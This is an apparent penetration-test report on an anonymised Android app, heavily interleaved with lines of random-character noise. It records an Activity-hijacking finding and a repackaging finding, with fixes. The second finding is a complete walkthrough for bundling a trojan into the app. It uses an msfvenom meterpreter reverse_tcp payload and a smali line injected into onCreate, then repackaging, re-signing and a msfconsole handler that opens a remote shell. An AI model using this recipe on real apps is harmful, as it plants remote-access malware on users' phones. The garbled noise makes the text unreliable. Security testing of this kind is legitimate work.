. F: T1 P: K, D1 R& U6 W" o4 V
& f2 M2 Y6 Z- W7 w$ r1 r) @
$ ~% v2 t$ h+ i& l( q! R6 c
& C; ~! B! g/ z7 j
7 l3 m6 Y% {! Q
) Q4 t" c) Z g- o, }* ~4 M5 R7 I
2 \ X2 j5 l$ B6 v' s7 `
6 P) y M" k2 U% \
& S! E1 R% g) V3 S& S 表1-2 测试结果
$ C3 Q" f7 t/ f( j) W0 Z
" R0 h; \ L. x7 {
9 `' b. L a3 }
+ d0 z' i, l6 n9 R
1 p* g6 l0 e; \3 }1 J
9 w) R6 H( u# |# _# I
) `% X/ \+ x- t% `
, C& q& N& n* _- U/ {
& r* Q/ T/ `/ C5 A8 V
: X# e2 Q5 S9 m/ p5 H% N8 ?3 [+ G4 P 3 `% [/ x1 A3 A
* v( R- E* X0 X* z2 } 2 检测结果 ! [$ f1 ~" M& Y5 a% v$ D
" k- k6 a, J/ O- f$ O
7 H1 O5 H. u, B' I; s
6 i) ?, r- c! L5 k
" x# B3 l* g1 [
/ G6 d' y+ K: g 2.1 某某某 ( o" ]+ N4 A- B& h
P( ?: L0 h2 j; ?1 s- u
/ M' H3 [2 _" t8 C
* g( z5 p$ k/ {, K
- H, N. O: ~* k/ V. F8 \, H
) D6 k3 M& r3 h; `" j7 R7 F* I0 ~ 2.1.1检测目标
! k5 G8 p, Z. M4 I/ x; `/ L, N- k' e: [' d( ^
4 P3 q1 M3 T* H$ u
5 o+ m4 I0 K2 W b6 [' `1 L- t
& E+ I. Y! O x. o2 t
9 ^" H ^7 n. T4 `; i9 `5 n 目标地址: 某某某某某某APP
! C6 _$ |3 b0 ^ a4 ^
/ M$ G7 n; b9 m8 N! [: G4 F2 s- D
6 I; R% c5 o$ e p. M% o
" B8 j' }" ]+ B' J" k0 a1 H) D $ y) g: W0 ~, ]: ` z2 Q
A6 P, p) v2 @- ^$ g
2.1.2检测结果 ( s. s# H9 m4 S1 T& }: ]; h* D
* _0 d# i+ l% z5 y1 U2 Y
5 d% S, V* n; p% [& l# m2 G' |! {) q, o, G i/ Y
) R1 N+ }" F3 j/ ~5 Z; V
# I$ g7 Q7 g; {9 ` 2.1.2.1 * @3 t+ G1 s0 ^/ a
1 f7 o9 ]4 s2 X+ o& P
, u+ T, L" W: e
# L& K0 Y% m/ A1 R7 o/ R6 Z& w; }
4 [ n a( w+ P5 H, i) N0 b- o. o8 t9 W( B1 [* \8 ?, G
漏洞链接地址:某某某某某某APP
( |" ^4 ]$ f7 h" r) m+ T& _. D7 v: B6 v! g3 w! N3 p' c
( [# c/ R% A/ U: h3 l
3 j0 G, V) R9 M- s7 U
) B$ ^/ W2 w5 I7 i3 |- ~, o6 [( \6 W0 i+ B: `! L' d2 z. V u) Y1 m
9 X: m' V8 `6 }: o
2 s. c6 P* Y" j, O! U7 J% ~
8 ?/ U. Z6 l X( P' C
/ Z) p) K" y9 i0 U0 J* _ 6 U& H' U/ W' Q
7 Y" J n) ], r2 g7 x+ x" q7 b) X 漏洞分析及取证: * x4 _( K! J% p' ]# e& w% t3 v' ?
: E' d5 h% F% v, N: ~
3 A- [0 ?1 i8 @( c8 D2 v. ^+ X
3 F% w M9 N8 d G+ d4 I) k" q
8 ^7 S+ k1 w3 w* K2 B k8 D2 r: m
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / o( V% b* g. m: B6 j( t* e3 r
2 r/ m; o: _. a8 h; o
: K- W4 A! [6 b0 k4 H2 y
1 ?! t- }- j' D) L0 I : y; @- q: @* ~$ p5 H" {' r
1 l0 w" w* e; g
" Z I- _% Q' s" _3 }: w }' |+ D2 ]0 e" w4 |2 l
5 E. W X$ m/ t. C$ T7 R$ i* @) ^8 Y! V2 D
( d4 a; \: U! M* v9 g
, c* ~* f& T! D0 J' g/ t
7 X0 ?; Q9 Z% g. d0 E
+ D7 u% J4 Z, }7 i) k
, F7 ~* t; O) S- W4 c5 c; \( i
# i, P) Z) h$ ? / B% `! g9 O2 `2 B
' I4 W% R* C9 D
8 }% b9 x1 N) o5 U( H
( o: p8 `1 H/ O8 ^! O. d
4 t& ]0 I# s n6 c
2 M1 x1 H1 `2 E2 D' t
- d& O! y! c1 v5 t
; S, f0 m6 S3 G! ], W2 Y1 `3 r , Y: Z& f9 R: J# X
8 a7 G1 |! B$ i
0 P, m, u. k4 n) f
& G' V# G1 ?: W9 A & _( h, k. s; v7 o: S; O& A
) }6 [" m) I5 v, Z/ F, X/ X. B
: F/ E( u! L2 v. s1 K- \: R
h" L# K1 S: e# D
, G Z) K! a. L
# I" t: Q, c0 y! [0 L ! A1 {8 d3 g; W# V
, T+ _8 S& x; ` 漏洞危害:高
( R; q% \. Z$ u d( J9 m
4 ^. w$ ?3 \+ b w3 X
' `. Y4 J. A( I) P
O% {6 {! Q1 ^- \ 5 c4 K/ R; j: h- s! d& M4 G+ R
5 S; k, k8 a3 I6 Q E+ H
; b* E& ^& L& E, O# a* A" m6 c+ I7 P5 u' }6 K
; ~$ d1 z1 Q, a& O2 l
; v8 @- K4 b, U' m- j5 G7 g& I0 y
' d; w2 S) n8 L" {* r
& L) R7 R% m, U V3 z7 V, K" \3 U
" p) P/ @1 ~3 h7 s3 q) |) \+ g3 I+ @5 |# k5 m
5 @; O4 J1 X V& ~
7 m' c2 A( v, C: Q I8 P2 }
严重程度 . q p% {8 t2 @7 K
' I1 z7 r" v4 c' r6 B
0 r8 i$ K- L1 V) [# _- }3 }+ |0 p
2 u8 U7 F' W2 Y- z* h/ _ | # d3 c) ?6 a1 v# P( s1 ^& o
% y/ n7 `( ^1 r7 ?3 e
) N% m5 }" r0 M3 d2 l+ D; _
8 O( {4 b' O& B! ~; M
( d7 T; e- j6 A/ Q' D# O& s t* E2 |# H5 y1 }
高
* @8 Z8 Q7 K- B- l+ i7 ]) O1 y
" a0 j l5 \2 p9 R9 r* S3 N# d \- l$ U) t# ~
) C$ q; B) l: {5 y3 L9 u- H4 e# c
|
9 L+ o% H) ]" x& ~6 ^& n! W4 y) q" F9 W
- c3 P" S4 H1 g" B+ P
$ C# G0 G( H/ x3 Q 7 ]) F/ g5 J1 |& ^
p. e0 {/ Z2 o* I, `0 ~' t ■
9 M8 r$ s; P2 j- ? z1 L+ k- T# f
+ p- _7 o# }; E
: H# d2 ]0 O5 y" z- k0 D' L
3 [3 p, B9 a4 b% V# @& \' l | 4 k5 Q+ L8 Z: ?/ U" x- b. J" B
* \; m" Y# T; w, I
% x6 ?, p8 M( u ^* q+ S; w* c! S# o; o/ l
+ k# f1 h! A. M" K$ L7 P9 o {
' d4 L& a) i3 u/ q" R3 u* V, B 中 R& @& |! v6 o
( c O5 @) o7 e2 T- K : P4 L+ F8 d( M v( v8 Y- _/ B4 n
7 X; o2 a% C% V' K |
, h" ]( a3 ^+ T, E; m7 b$ `% q) ^! t; K2 A, w0 T( j% y7 L
# q$ }" y+ G1 o0 _% Z8 Y% Z
. H( o. V0 k: B F# V: k& V
2 f |' @+ A+ d( \ _' x
* j3 R$ K0 y* z
1 p8 L8 c0 x1 p! p: @8 k: h4 ]
) P" S f. \5 M, p
( K: `9 U; B8 ]4 U o
- Z# O5 _6 f, _0 A$ S/ ^0 L | . y8 L9 g& m( T e: q' C" C' t
# s7 C. |" g8 r# n9 r, ]! B6 ^, K / r9 v2 A# K9 H: f
; O8 i8 {3 a- n; A, s2 S
6 h+ X" U, U; v* D0 l2 b
' D5 I! L, S7 F k 低 * d+ U" I/ _7 e5 x8 B
3 m6 V1 D" D( g) K8 h ' s- N* ~ ~# v: ]
6 N6 P+ U( J& E$ T |
7 Z' R& e! ?* o6 k' W
2 y+ e/ M/ k+ D. l . @. @: J- L0 }; k% {
7 V, Q( v9 d, s6 d
1 V Z" B: ]; k8 C) v
3 p4 S: d: [6 j6 T) V
+ c9 O1 F+ T9 M# Q) l" C8 K' o, P2 @9 n: G# w& B' K
+ v2 L; W2 m& E- ^1 R$ |/ q+ C0 a4 d
) O7 i W8 a# Q, x6 q" M& T! c |
% m0 r, R3 l3 A5 E1 U1 z5 l9 G D! A: m' N- R; B' }
2 D3 U- r# N2 s$ u' I2 f1 ]4 g/ y5 j" ?6 b2 G# S3 |& J0 ~
Y( S$ O# R, f* Y) T5 S! t$ x8 {0 X" t
' M6 f$ C7 V- v [0 U" ^
7 {0 P) O+ }5 h4 n. e1 s) J ! k, \! ^. G% k7 E5 Z; A% v
0 t% q# q2 g. S/ R9 D
; j3 U; m! H; g. b) \( n3 _/ l8 g" n& T; H7 u9 e
9 O! x' F# Z7 W% p
4 o7 a2 x+ H- D g
/ U1 Y3 R4 a E \6 E7 x2 S
9 t" S* z8 Q2 i+ E9 Q# O
" l4 _6 a7 a4 A& u& K- r# t$ D! N+ A& P
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
( }% p$ M# G8 x; n( `9 S& ]) Q, _0 }+ n d% ?0 k9 K1 i, ]
6 Q* X/ r0 ^! \/ Y
7 \; h' B# K$ Y( v; X+ A + w" E) d: ^0 o' U7 M( s' [
6 e$ `" z, `# e$ T6 q
) \9 T, s+ {8 g& L- T) K" G
. Z& p% L' ]% I9 H
# s$ _0 e& C; Q; h. F# Y* l# e
' K0 |4 ~) ~! ?2 x% C; C
9 T9 W0 A. ]$ B/ W& ]/ L$ Q
1 Y7 Z8 y2 b4 e/ q/ C3 _8 {6 k
0 ?; ~/ w9 q( b P2 z# X. q( `. ?$ e: W
) _+ ?9 Z* q. N& z, G! K: e" B0 f% U* _6 C# R# D
4 w; V) \* a9 f/ e4 v
* w. [# J# ]9 i+ J6 B' m9 n 2.1.2.2
2 B" t! P0 K7 U8 w% u2 ?" M, W3 s& r4 t b4 W$ D7 _
, x- U0 M+ V3 f% J" Q7 U& S" g* I4 }- ?, g: i8 V4 H
6 d# f' I2 t6 n; @, v; V' O
; L' e; f6 ~& k' N8 U4 m5 I 漏洞链接地址:某某某某某某APP
7 Y2 X; h, ~4 Z+ T5 W3 x* F3 E, O! m8 q% B" w' L. o! n( d
" m3 I& d9 S; G" N
# [4 T/ }: {- C2 z
( _2 `, l& F" J5 R5 W. n
4 i! H5 P$ L+ T# X7 e3 m) o) ?
漏洞分析及取证:
n; ~: u; N6 J8 J' G9 t. R5 x, i# m7 t2 A4 ^; Q
3 y& k- x8 d8 j
( N7 {/ M" v) l' g6 H5 j
6 I. D4 H: c* D3 r; H0 x# Y8 `+ `- \8 S% J6 Q6 r: G
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
4 ~ c- h- y* e8 O' d( f; Z2 E; J$ N
/ |8 U. z7 t$ \( M$ h' [+ p+ ~
) @1 R3 f3 v" ~, a W' r5 C
; K, W: i6 z( L7 g9 R: ~) G8 w+ T
0 p0 k7 e5 i i: W; g4 i
7 h0 a+ |( z. ]1 z# y l1 u2 | 用Metasploit 生成木马 apk ( |- o, F$ L1 H
; ^7 v5 H5 f! c: ^* E7 V
* Q3 s$ N: O, e' B; B4 b4 N
0 [7 P7 X0 D) U6 m4 A- K0 v* G
3 A( R1 \; u& |7 `
* }3 w. J8 \* O; o! j; u msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
2 w: L4 C8 z, o
: z- p9 r- S% N Y
6 U' _& j0 U: r! h: r
: K' V, @4 m& h% w0 r
M' X0 Q4 L$ C) ^" L- L! o
, ~' T0 @ ?# a# i0 a$ U 反编译目标apk和木马apk
$ g3 d% e) |% t. d5 Z
) m4 e; L# t" n# s* t, T6 z% ~8 r% @
# `9 k( O. |" K6 P
, M6 C# V' V8 l
: U( O3 ^4 G+ u) x! b3 n1 `0 U) x- J! R1 d/ x% ~+ d
apktool d target.apk
5 w o# C, [' |% b3 I" |
& L& D$ p L. e1 J4 P4 u1 L7 h
apktool d cockhorse.apk
) g8 q% d+ E* f1 h. t- T* X) m' x) O* }- [9 I. h
: [0 |9 N Z+ q3 Y
4 V+ t0 R& t0 i" T' d . e1 Z q% M- y
- y* [1 f4 G% g+ Y5 u 木马 apk 注入目标 apk
& i+ G2 C3 v' x7 l) n8 y P
* [/ t% `" [( ^6 S% b3 r4 o
6 l) ^; m1 c# L8 T4 H5 h7 `1 x
0 ^: ?. A2 Y* P
" J6 R! Q' N4 F: g! c
( K% O; L0 Z2 O5 ^ Q0 b 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
- t7 [# i1 Z0 G& T
" H; h; A9 A0 j! D3 x
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 3 s; n) |0 @7 C
" ?+ u, {3 g* ~0 l( t) K% r
, l/ z: G$ w0 L- _; T
5 H3 N& F6 A2 j; b) z4 T 2 |0 c. X' Q+ q( _
2 U7 c( e: Z6 o2 H8 Z6 O+ P
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
3 L1 S( V* l) R
/ K, L$ F( _% W: I% L. z/ f
3 ? @/ _+ C$ [& ~
0 G/ I) N) s- J* ^( Y/ u
, X* T0 l; N: h8 X& J* Z; W P! ^0 D
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
) |) p- A1 U9 |- ^* c9 p8 @& I1 L& N; }- ~" k9 l5 H0 o0 A, Y E& j3 v
+ S+ f& [2 L9 l5 n( O
& t+ I; n T$ |) D3 Q! j# j5 ^. r
: `5 f/ h: b) P" z$ c/ v+ K( Z4 f/ f; q' |4 G/ m
回编译生成最终 apk
H" j7 J& A9 E* M: t% y1 G. W/ \
8 g) `) I9 \& @) a. Q3 r) c
- ~2 }: h; c) S/ ~3 D( J
6 T) k* e- k( E. U! |# [. k ( W* V9 j# E5 |" ~( [( [# w
! z; h" e* Q8 w3 Y1 s3 m 重新打包 : X$ {; r7 W. h( x
) W! ]5 S! _) W! r. n! ]
8 b2 Y9 v! D! b8 _ n& e" W1 ^' D& S! n6 }
9 P- R/ V8 R, X) Y& Z
, W8 P8 {. V: U! X6 M7 L# N) H apktool b -o repackage.apk target_app_floder , ]8 A% c" r( M
, y: f6 I$ t& I/ _% }$ q* |* n. n2 i
" G9 Q1 F/ q4 H( E0 E# p$ @3 W! s; U6 C' @$ C) k; D
/ e3 s3 N' |% j0 N6 `* V4 l6 Z5 X; Y% Q* w5 Y
创建签名文件,有的话可忽略此步骤 % }& X3 u+ p% L [; u
4 d2 ^ b7 F. D/ l1 U& b; Y$ q5 H
' V7 a9 C }4 j7 X: ?
' E1 C% r! V5 v( J6 q! M4 k5 {: |
/ ^4 h1 y! [ _; \. `/ `, t8 P; {
6 q6 j0 e0 ?$ y
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ) G2 Q! ^# d5 B2 r' G8 V
+ l) L" J' k9 c7 F% i3 ?2 ]) d# u0 \
+ N, o( W. O; M6 }
7 N' W2 D% W z+ Z- O! _2 f; s * s# R; f5 U) _; r, M6 ?: ~
% ~4 U5 g% T2 E; @7 ?( C
签名,以下任选其一
6 X& [& U9 z) \4 m" e% R# R4 _0 ]# `5 I1 k5 A
R, U4 q4 Y( R. ?% j- N
, r7 }( f& N4 v3 o0 R# |6 P 7 t5 r) _- w& @, s9 p9 R
- B5 P$ }% O6 M% ?/ I" ?
jarsigner 方式 0 S1 m4 Q9 Q$ o/ ?
$ @1 K g" [$ g9 g- F% n+ {
6 K! c+ h: M8 c, z U/ t) R0 h H$ O0 S" {' c" A
" t7 d" u+ F- B) D/ |" j2 P5 \, u, \
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " d" d/ X# \; T# S4 E& |* t
( M5 |0 m) h* A8 P
4 j* R p& Z0 k) e
+ t0 y6 ]& l# {, z6 d% L; j / T \3 u* W/ k; S% u- p) w& G
: S# X7 k: p) l1 S apksigner 方式 * u7 C2 I* g0 ^
3 c' t% y: x6 \. D9 s
! K0 D t& Y1 i7 N+ ?+ f' c
! u) o8 s0 W) B9 n% f0 M + N8 D% q' M9 f) \
& X) |9 e: {/ A+ Y) i# V- ] apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 ^: @/ ]1 V6 \0 X( q
4 J2 O8 x2 i# l/ L- M4 K' r! y
. v# H2 W: s: B! t( R9 p5 E* D7 T( u: p# l) R1 b) t x
1 w {; _/ M$ c% Y5 m9 M
3 c4 z' B" M+ L/ @4 Y& C
如需要禁用 v2签名 添加选项--v2-signing-enabled false
: [/ z* @6 @' |/ @# n+ |, v
1 z' |" k: U8 z! g& l
! X2 h+ U9 {' W* x, ~$ Z Y+ D
6 Z+ f( i8 ]+ I2 J: O ) t7 }2 `! ]0 ]
! H* Y; g* M7 T/ s, @) q 验证,以下任选其一 0 I: V$ ` Z4 D6 u% Z
3 P0 _ [' s9 p" i o
. T/ i( Y2 m/ c: Z( b
7 f' u+ ~# L, V 8 e& `$ B2 }4 M* t* R
0 S/ x& w. ^3 D& u( e$ z
jarsigner方式
N$ u+ I1 `. n/ M1 c6 E+ r4 u
# H& ?) k% P' V
7 j4 j" k. a! J; h$ k0 T; H
; V; Z( U1 s9 t9 u/ G5 ?1 y * |: `- Q- g$ N
% j2 l( ~4 B1 z# D+ G! E$ e jarsigner -verify repackaged.apk ( ?- d0 P/ @& b& g, E( X3 }$ e
% f/ e( m/ l4 U# o
6 Z# m# N5 ~5 R
' ^. P; [) W/ [ ' X: s& i- ]* B7 ~- C3 ^- [, \2 [
9 r" a' F6 N6 s
apksigner 方式 5 Q* @$ C7 W9 s8 X3 `5 b, f/ }
. T0 A6 Z7 b U* x! `
9 Z% C5 R( _* H& n, A/ M6 ^
; r! g8 h4 k, {- ?8 c; { 9 T8 p. j: f1 E! a1 @' I' W6 F
; ^- k! f+ m- K4 ?, l
apksigner verify -v --print-certs repackaged.apk
) V$ U1 B. K" z7 W) F w7 y0 `: a7 ~) X
4 o9 x4 t! J2 V" S0 ~- K
- @6 W9 }( a% m( C- N# e1 w L
1 Y+ T4 f) `" Q/ E) I( l. x6 C% A4 n# K% J6 _+ S9 N$ O
keytool方式 5 K7 }# d/ \) V) {3 i5 E3 e3 ]. y
) U3 b! H$ X/ B' }4 Q, ?2 t% |7 L
% u _ J2 L2 y
& s6 b G* M% O. z3 v& _+ n
% \6 ^9 w' _$ r" t2 v: |# y
" d0 x* G$ |5 Z) o keytool -printcert -jarfile repackaged.apk
, U$ ]0 d. J9 W8 g9 q7 k
# B4 u: m7 T0 C% ]+ l L
5 n4 `1 Z& y7 A$ k$ H( U6 d" m/ x& r: |8 B& q2 Y
) ]. t& R& a5 Y
1 o1 k( F8 {9 u) o( v9 } 对齐
3 u9 c% b+ |, l9 S6 U, z1 a G" y4 {2 z2 U& B* N7 k
& l3 B) @* z T2 L* j7 D0 h+ l' h& V/ B
+ z- K4 O; x' D9 }( b" c9 w
8 l' ?6 e2 ?- \7 T: n) o7 } 字节对齐优化
7 L7 y/ M* g. M, |. z7 ?$ G
9 J! H# `& B) h) P
; r: A/ o$ n, a% E. T, t2 Z
8 J; i8 l1 g# {! B& c
2 y3 f- B6 D% x, F6 y; y' `0 E* Z! U* m! _/ @5 Z' u: j8 m
zipalign -v 4 repackaged.apk final.apk
7 ?8 c! J0 H' H/ _" ]
; G5 D$ T* a( A5 K$ I* z& [9 S
* }! y, _9 f# ^. U5 ^
) u% j( u: ]6 ~! E( U& q
1 ^" r) Y) O! q' H( ]9 e
2 s: U$ ^$ U& P 检查是否对齐
8 @" T) o. b* o
& q+ }; c( t& q3 x, O. o. g8 |
3 ~+ i! U2 S* I1 y) k+ r2 W/ `. p
7 n( @- @. x+ u* P6 l M- c3 o 8 B) W3 D: E i/ K
% s/ |: M7 N4 F9 v. t \
zipalign -c -v 4 final.apk 3 ~ F* i+ S! k
* R8 u% A1 `, h; e' z' F; |- u- l
- c& ~( r+ i6 u! g2 n) R# a ~
; S/ W8 R( w9 E* Y3 q N % {; |% C3 x2 e0 I9 }
3 ~$ k6 _5 t/ f g 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + U, _, N$ m2 C0 C- @+ v
$ U# q; n# E; [$ i8 `
% h* ^$ a; q) P8 e1 G/ n- N" t5 P: }
2 a, O: f( @/ E. B
" S$ K L* c6 b. J$ u* y 启动Metasploit控制台,配置参数等待上线
7 j7 L5 {. m' p- p# o* G* a0 B: L7 g; A
* x; [% |) o0 ~
4 x( o, \7 M5 |* K( F! b0 s" p/ C3 C! U' c+ T" g+ ?
! N4 z1 B: e4 y8 \& S6 S
; A$ N9 u8 s" x3 Z( ~ 在终端依次输入如下命令
. v( ]; w {* ~2 `2 |1 ?- F) c
6 \7 o, Q: p+ V
: l9 I7 L' l$ |3 O9 I8 d+ c
2 V/ i) O% K% z6 ^3 E$ \
3 H. W3 U: {4 r. o5 O* B v+ s) t5 N/ D& d+ V) ^
msfconsole ' _8 L5 M( Y- g) a
3 L) j* K& ^5 n( T' M
4 z7 |. g! C3 X. O
9 l3 G; P5 {2 H: E& c' i' j/ \
6 s% U; }2 f$ K- N& y9 ~) l
( \, F( O& k) Y, W+ Z8 ~$ ?" E9 N
use exploit/multi/handler 5 e/ n0 U6 M; n$ z5 h
$ N! `( j0 p/ a& k2 r N; ~) K; a
, L- F; M4 h' e/ ^- r* L. }: o
1 B4 t( f- y& S
" w: M5 ]+ P1 {) _/ S" V* {% K: K
) u& k/ b: H) k! i set PAYLOAD android/meterpreter/reverse_tcp
$ n* k( D5 u* H- J6 Y5 V& U
* s- q/ i N8 Q. {+ Y' _( U& f
2 A" D3 u. ~. \
) _, D; p S: l$ v* E. Q" x " h" [" S0 J4 ]& L
4 o/ P+ Q3 Z1 v
set LHOST 192.xxx.xx.xx
9 F' o4 M5 `' r2 t' V) \, V3 u' F
+ t6 _: ^4 ?& r' x P9 t
: i- T4 A6 m' M0 y2 r
) o- N0 o: z! n$ G( v) v
. o3 j, B9 ]" X' ~4 b set LPORT 4444 1 M" B' w) n I) y( V# e. W$ B
7 F' g8 Y; F0 U9 O; z$ ~ t
4 A' _3 K- n- E
6 q* l& C1 I; t8 q
$ ?. K7 E7 @' g
2 h% y! o9 f2 w$ q- G0 i2 W: r exploit
' R, g8 e, x8 \4 O2 H
$ g2 _9 x5 a+ J+ M, k, }
: S1 L# e& b$ U; P; _
8 @$ U4 J( T3 Q3 j
8 p2 C6 w0 Y/ y V+ A h" a. m+ {9 B4 i4 D# P( ]
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: ) X/ ~. c; i5 W$ B K2 h( d
! M. }' }7 w: P8 H+ w- {) F, c
, w7 F G2 ?! g* i
9 z- u3 j! u/ } o3 H+ l& A. A
6 c' E6 Z$ q! k% h
% ]! u! V* u ^. u; i" F 漏洞危害:中 R/ e4 Z# c$ t- e3 `* [4 c! C8 a
' _6 L& G; |% ]! {
0 H% j/ y* J' A1 a
! s' X* f q5 W- f9 X) @# q ! A3 t. a7 X {9 {, w8 O7 P
8 Y! B! ~) T! l
- ]9 Y) C% I! M" G6 |
& A' R! c8 x* l- X6 {! N
* f6 d, K2 o( e! e0 u! ^
; U+ J4 j2 G3 [
/ E0 l' L% [& R& h' U- V4 d/ V1 Y0 I* Y& l+ r
+ ]$ d4 j! d% E5 {! m( [
) z* k8 ^% b9 V7 k
8 u& L7 D U; w9 n
( S! z, q" m/ m$ p2 T4 ~ # T( |9 q' O: u! J$ N
6 O3 |( D$ k" d n3 u
严重程度 # ^- A8 w" C0 D
; r9 u" z- w1 }5 U' w3 h 7 E5 B" a( M0 o) g8 ~3 b
' C9 m( O2 n- A# i' p | 4 T+ {) I# r) w7 a* z/ y# R+ y/ U6 ?; L
1 i- R: n8 G1 U, ?( f! J: v: T
( @6 P1 U' i2 L3 o3 \
& F! G" |4 I- O$ l( \, V. L$ Z
9 O# L7 s7 b/ a& t
+ g# ]0 [9 k: Q" S: B, U$ f# y' n( I 高 / t9 }( U; i$ Q* n, M$ N! F* w
3 e: { R0 ? ^ 7 R# C6 [( M0 F x
( G" x4 h- Q# a3 q | $ U9 a x! w" z2 y$ |) ~
( Z3 `0 j- \9 f- ^" H2 b 7 n. D d% ]5 \: T, f7 n
0 ~) E5 } k: K
& ^8 o6 l9 V. T2 d. o, N \+ {" N: g o( g
■ / J' h6 }% j N: N+ l% [8 u2 b
/ D' E- x! s$ @- \0 o
0 Y! U1 ]% W3 [1 l, Q/ `4 \
3 |' J1 L8 c$ L |
/ Z: `) H( w2 Z8 K: K
, P: N% \# {, b+ [" }' |" ?; x9 p k $ n, \6 O, ^ R& I
: f) S( F& A- r( `+ a: z
/ Q8 u/ G) L. m
4 n5 O" r0 N3 } K, C
中
3 W- T) v7 j$ i3 f' P5 b) F
! f$ t" U' P/ G1 l
7 W+ b% W- m& O+ H8 L2 t& ]
3 x$ O6 a8 f9 h1 E6 f | 4 I* \& G+ I3 x
) v7 J) E0 c& s: N5 a
* N! [& k% x ~/ u) E: m3 i) d1 c
o% x8 K6 E6 B- H" [( }+ x" f2 U M T$ _9 k
, S- \) Q# b4 Y; m0 z: T9 _ @! d5 m$ S! ?3 t& q
; Z/ C) T( h; z! y9 m! }( h" M; Z5 M, W, u7 ~2 a* [" Y
* }3 u2 U/ \% [2 ?6 _5 O8 K7 \) x* N1 I9 F0 r' D
|
, A9 `* n8 h+ }8 u3 L
2 ]; G" q+ O0 \: ?" Q4 ]1 V 5 }* g6 q K) u+ j4 E0 \6 p) q5 {2 u
6 e4 C; k' O3 M6 {0 r0 i: ?
8 x. s8 t: p& @0 Y
7 d2 \; g+ E4 X/ f8 w/ K$ s/ r7 l
低 9 a" {; N6 G6 f1 c7 K3 j
# T s. h' F: o
) Y! v& x6 |- }# z! V: ^
3 Y2 J9 T8 \1 O- ?/ V: M: f7 W" h
|
' T! i( n9 I3 J3 l, F, p* A% F
+ @7 U/ N& V7 Y 9 g( C% w* R$ e" J* b! l
. n+ R# I4 H( {( G. d0 r. u3 P
% {( d/ I! m' w; x8 c: _% r7 e3 V% ~" p
; M7 P" C M, }- b1 s' ^& s; W0 Q' n- L0 r/ }* X2 o1 v3 l8 O
4 ]1 c" c& ?1 p/ z
$ v/ l! q0 _8 t# b F# x 2 a( s( O7 H6 H, D/ r8 `
8 ^5 k, S' M, n7 l" H1 n4 m8 R; k | 7 D) o% Y& U9 `6 D) e3 b
$ I9 [7 `# K! u* j2 g% q- M3 I+ Y
z0 u5 y5 f( Y4 n9 a4 }/ ^$ `, T+ b2 k( G) D
( Q2 ^, u {9 d" I+ E6 K2 ?8 J; N' x7 ]- ^" ?6 E
; l9 E4 U. Q8 N/ y( X
$ P$ c2 l, M, h% b/ t3 u- `1 }8 Z
2 d, j, V2 g# ^; j
+ [5 R+ b: x5 r7 y
4 ?( Y- Y* U. u/ |& o/ z2 Q
/ T' T; O ]( W7 d9 s2 a
1 f @8 [- F! B0 n( r9 a
% o, E: {" ~( [! W# T- f
, P- G# R+ @. X d5 _5 d
9 `# W B, x3 r; s/ q8 z 0 e. w) @2 S7 c0 \
3 }9 m: L; @7 V o0 B& D) y% [+ i 修复方法: ' j: \. z8 @( x) C! \$ K/ J3 ~
% Q/ B4 E3 S' i4 P" |+ W3 ?- h
! V1 O9 p6 ], ]: s# M& U6 V' d8 X* d+ _4 a( c$ A/ i/ }
% `, Y1 ?& _) N4 J" u% O. f' {% O$ w) Z! I1 `7 q
1.在 APP 启动时应做签名校验防止二次打包。
0 S8 I& t/ b2 [+ |8 ~
{6 Q) O, b6 D& V9 ` A7 _
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - Z& x3 ?+ c" t+ k
! E6 r; Y o% o1 O& s. h$ p" g
0 l/ o8 X! Y. E8 \! Z- S j& X1 m! M" E: d8 M' b1 i* W
+ I6 c+ e Y7 n' Y z: \+ [* Q0 k7 r. e8 ]9 ^
8 p7 z8 a3 @/ t* C( n" ]; P2 C7 z
4 a4 p, ?% u( f" ?+ ?+ B
4 b |/ l9 U, D1 D9 w' B8 o( q. W) I0 Q) B0 g$ j$ w
: L& c% ?; z7 k v2 l' I' M& l \' f8 `# H% p, _
; z3 c U. H% n" \
. m0 K- ^, ^2 n; e6 f) Z ! n1 c3 A3 @0 i' I) M! |
8 p! g* }: ^5 B
+ A# Z0 e; A1 }, ]2 i
9 T/ \+ z7 @2 K! Q+ N# Z
; B7 }& F) |6 @( F! Q
9 L. y+ q, p5 P